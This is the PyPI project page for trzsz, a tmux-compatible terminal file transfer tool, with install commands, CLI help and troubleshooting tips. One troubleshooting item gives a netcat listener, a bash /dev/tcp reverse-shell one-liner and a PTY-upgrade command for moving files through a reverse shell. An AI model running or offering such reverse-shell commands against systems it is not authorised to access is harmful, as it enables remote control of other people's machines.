Skip to main content

trzsz is a simple file transfer tools, similar to lrzsz ( rz / sz ) and compatible with tmux, which works with iTerm2 and has a nice progress bar.

Project description

trzsz

trzsz ( trz / tsz ) is a simple file transfer tools, similar to lrzsz ( rz / sz ), and compatible with tmux.

Website: https://trzsz.github.io

MIT License PyPI trzsz 中文网站

Why?

Considering laptop -> hostA -> hostB -> docker -> tmux, using scp or sftp is inconvenience.

In this case, lrzsz ( rz / sz ) is convenient to use, but unfortunately it's not compatible with tmux.

tmux is not going to support rz / sz ( 906, 1439 ), and creating a new tools is much easier than patching tmux.

Advantage

  • Support tmux, including tmux normal mode, and tmux command mode integrated with iTerm2.
  • Support transfer directories, trz -d to upload directories, tsz -d xxx to download xxx directories.
  • Support Windows server, not only can run on Windows client, but also can run on Windows ssh server.
  • Support native terminal, does not require terminal to support, just use trzsz ssh x.x.x.x to login.
  • Support web terminal, transfer files and directories between local and remote servers over the web.
  • Support drag to upload, drag and drop files and directories to the terminal to upload to the remote server.
  • Support progress bar, shows the current transferring file name, progress, size, speed, remaining time, etc.
  • Better interactive experience, shows the transfer results or errors friendly, ctrl + c to stop gracefully.

Installation

On the server

  • Install the Go version ( ⭐ Recommended )

    Please check the Go version installation guide: https://github.com/trzsz/trzsz-go#installation

  • Or install with Python3

    sudo python3 -m pip install --upgrade trzsz
    
  • Or install with Python2

    sudo python2 -m pip install --upgrade trzsz
    
  • Or install with Homebrew

    brew update
    brew install trzsz
    
  • Or install with Node.js

    sudo npm install -g trzsz
    

  Can be installed without sudo, just add the installation path ( e.g. ~/.local/bin ) to the PATH environment.

Supported Terminals

  • trzsz-ssh ( tssh ) -- simple ssh client with trzsz support ( ⭐ Recommended ).

  • iTerm2 -- check the trzsz-iterm2 installation.

  • tabby -- install the tabby-trzsz plugin.

  • electerm -- upgrade to 1.19.0 or higher.

  • ttyd -- upgrade to 1.7.3 or higher, and start with -t enableTrzsz=true, use https unless localhost.

  • trzsz-go -- supports all terminals that support a local shell.

  • trzsz.js -- making webshell in browser and electron terminal supports trzsz.

  Does your terminal supports trzsz as well? Please let me know. I would love to have it on the list.

Trzsz Manual

trz upload files to the remote server

usage: trz [-h] [-v] [-q] [-y] [-b] [-e] [-d] [-B N] [-t N] [path]

Receive file(s), similar to rz and compatible with tmux.

positional arguments:
  path               path to save file(s). (default: current directory)

optional arguments:
  -h, --help         show this help message and exit
  -v, --version      show program's version number and exit
  -q, --quiet        quiet (hide progress bar)
  -y, --overwrite    yes, overwrite existing file(s)
  -b, --binary       binary transfer mode, faster for binary files
  -e, --escape       escape all known control characters
  -d, --directory    transfer directories and files
  -r, --recursive    transfer directories and files, same as -d
  -B N, --bufsize N  max buffer chunk size (1K<=N<=1G). (default: 10M)
  -t N, --timeout N  timeout ( N seconds ) for each buffer chunk.
                     N <= 0 means never timeout. (default: 20)

tsz download files from the remote server

usage: tsz [-h] [-v] [-q] [-y] [-b] [-e] [-d] [-B N] [-t N] file [file ...]

Send file(s), similar to sz and compatible with tmux.

positional arguments:
  file               file(s) to be sent

optional arguments:
  -h, --help         show this help message and exit
  -v, --version      show program's version number and exit
  -q, --quiet        quiet (hide progress bar)
  -y, --overwrite    yes, overwrite existing file(s)
  -b, --binary       binary transfer mode, faster for binary files
  -e, --escape       escape all known control characters
  -d, --directory    transfer directories and files
  -r, --recursive    transfer directories and files, same as -d
  -B N, --bufsize N  max buffer chunk size (1K<=N<=1G). (default: 10M)
  -t N, --timeout N  timeout ( N seconds ) for each buffer chunk.
                     N <= 0 means never timeout. (default: 20)

Trouble shooting

  • If tmux is running on the local computer.

    • Option 1: Use tmux -CC integration with iTerm2, please refer to iTerm2 tmux Integration.
    • Option 2: Install trzsz-go on the local computer, use trzsz ssh to login after tmux.
  • If tmux is running on the jump server.

    • Option 1: Use tmux -CC integration with iTerm2, please refer to iTerm2 tmux Integration.
    • Option 2: Install trzsz-go on the jump server, use trzsz -r ssh to login after tmux.
  • If an error occurs, and trzsz is hanging up.

    • Press control + c to stop trz or tsz process on the server.
    • For iTerm2 users, press command + option + shift + r to stop iTerm2 Coprocesses.
  • If trz -b binary upload fails, and login to server using telnet or docker exec.

    • Try to escape all known control characters, e.g., trz -eb.
  • If trz -b or tsz -b binary transfer fails, and login to server using expect.

    • Try to export LC_CTYPE=C before the expect script. e.g.:
      #!/bin/sh
      export LC_CTYPE=C
      expect -c '
        spawn ssh xxx
        expect "xxx: "
        send "xxx\n"
        interact
      '
      
  • If you want to upload and download using trz / tsz in a reverse shell, you need to follow these steps:

    • 1. Use tssh xxx or trzsz ssh xxx to log in to the server.
    • 2. Execute nc -lnv 1337 on the server, and wait for the reverse shell connection.
    • 3. Reverse connect to the server on the target, such as bash -i >& /dev/tcp/192.168.0.1/1337 0>&1.
    • 4. Follow these steps in the reverse shell:
      • 4.1. Convert to an interactive shell, such as python3 -c 'import pty; pty.spawn("/bin/bash")'.
      • 4.2. Press ctrl + z to turn the reverse shell into background.
      • 4.3. Execute stty raw -echo; fg to disable the echo of the server, and return to the reverse shell.
      • 4.4. Press the Enter key, and the command line prompt will be displayed.
      • 4.5. Set the terminal environment variable export TERM=xterm-256color ( not necessary ).
      • 4.6. Check if there is a TMUX environment variable, clear it with unset TMUX.
      • 4.7. Now you can use trz / tsz to upload and download as normal.
    • 5. After exiting the interactive shell, there will be no echo, type exit blindly to exit the reverse shell.
    • 6. Type reset blindly on the server and press Enter to reset the default settings of the terminal.

Screenshot

Using trzsz in iTerm2 with text progress bar

using trzsz in iTerm2 with text progress bar

Using trzsz in iTerm2 with zenity progress bar

using trzsz in iTerm2 with zenity progress bar

Using trzsz in tabby with tabby-trzsz plugin

using trzsz in tabby with tabby-trzsz plugin

Contact

Feel free to email the author lonnywong@qq.com. Welcome to join the QQ group: 318578930.

Want to buy the author a drink 🍺 ?

sponsor wechat qrcode sponsor alipay qrcode

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

trzsz-svr-1.1.3.tar.gz (13.1 kB view details)

Uploaded Source

Built Distribution

trzsz_svr-1.1.3-py3-none-any.whl (23.9 kB view details)

Uploaded Python 3

File details

Details for the file trzsz-svr-1.1.3.tar.gz.

File metadata

  • Download URL: trzsz-svr-1.1.3.tar.gz
  • Upload date:
  • Size: 13.1 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.1 CPython/3.11.4

File hashes

Hashes for trzsz-svr-1.1.3.tar.gz
Algorithm Hash digest
SHA256 e994511688a62b16ce8c1b28f7abf782bccfd8a41728456ba58b5e7fef970c79
MD5 aad2d91405a2ecc3681f31a144cc7802
BLAKE2b-256 65cafebf965d861a7766fd93349d91f73892abd78b28b30d8ad97b540d1ba07c

See more details on using hashes here.

File details

Details for the file trzsz_svr-1.1.3-py3-none-any.whl.

File metadata

  • Download URL: trzsz_svr-1.1.3-py3-none-any.whl
  • Upload date:
  • Size: 23.9 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.1 CPython/3.11.4

File hashes

Hashes for trzsz_svr-1.1.3-py3-none-any.whl
Algorithm Hash digest
SHA256 069b526fb3eb85c2a8e339fea60c957c5db0935b0d36daf28c86e8ca12655fb6
MD5 f508050eaf7f04ca8582c36d519382bd
BLAKE2b-256 5f5ce6e4d79edce20a3e4753cef13572afcffb242ed435e0ebec7f1e6be2b4d1

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page